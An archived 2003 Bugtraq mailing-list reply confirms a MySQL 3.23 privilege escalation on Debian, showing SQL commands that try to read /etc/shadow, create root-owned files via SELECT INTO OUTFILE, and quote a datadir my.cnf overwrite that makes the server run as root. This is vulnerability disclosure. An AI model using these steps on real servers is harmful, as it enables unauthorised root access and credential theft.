lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <3E6CC7CC.3020307@nfg.nl>
Date: Mon, 10 Mar 2003 18:13:48 +0100
From: "Guido A.J. Stevens" <gyst@....nl>
To: "bugsman@...ero.it" <bugsman@...ero.it>
Cc: bugtraq <bugtraq@...urityfocus.com>, bugs@...ts.mysql.com,
	security@...ian.org
Subject: Re: MySQL user can be changed to root



I can confirm this privilege escalation in mysql-server   3.23.49-8.2 
(debian/stable on linux/i386). Any mysql user with file privileges can trick 
the mysql server into running as root on restart of the mysql subsystem.

Note that mysql prevents you from reading non-world-readable files outside 
the mysql data directory, or overwriting existing files. You can create new 
files as root, though.

mysql> load data infile '/etc/shadow' into table readtext;
ERROR 1085: The file '/etc/shadow' must be in the database directory or be 
readable by all
mysql> select * into outfile '/etc/somenewfile' from hack;
Query OK, 2 rows affected (0.00 sec)

-rw-rw-rw-    1 root     root           19 Mar 10 17:22 /etc/somenewfile

Not a rootshell, yet, but lots of new avenues from here.

:*CU#



bugsman@...ero.it wrote:

 > mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack

 > Now, when the mysql server will be restarted, the user option in our
 > datadir my.cnf will override the one in /etc/my.cnf and mysql server will
 > run as root



-- 
***   Guido A.J. Stevens           ***  mailto:obfuscated     ***
***   NFG Net Facilities Group BV  ***  tel: +31.43.3618933   ***
***   Postbus 1143                 ***  fax: +31.43.3561655   ***
***   6201 BC  Maastricht          ***  http://www.nfg.nl     ***

... merging human DNA with cow eggs, creating a human-cow embryo. A
Chinese scientist is working with human-rabbit combinations. Cow and
rabbit eggs are far cheaper than human eggs ...
[ http://www.latimes.com/news/nationworld/nation/la-051202patent.story ]



---------------------------------------------------------------------
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/           (the list archive)

To request this thread, e-mail bugs-thread13932@...ts.mysql.com
To unsubscribe, e-mail <bugs-unsubscribe@...ts.mysql.com>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ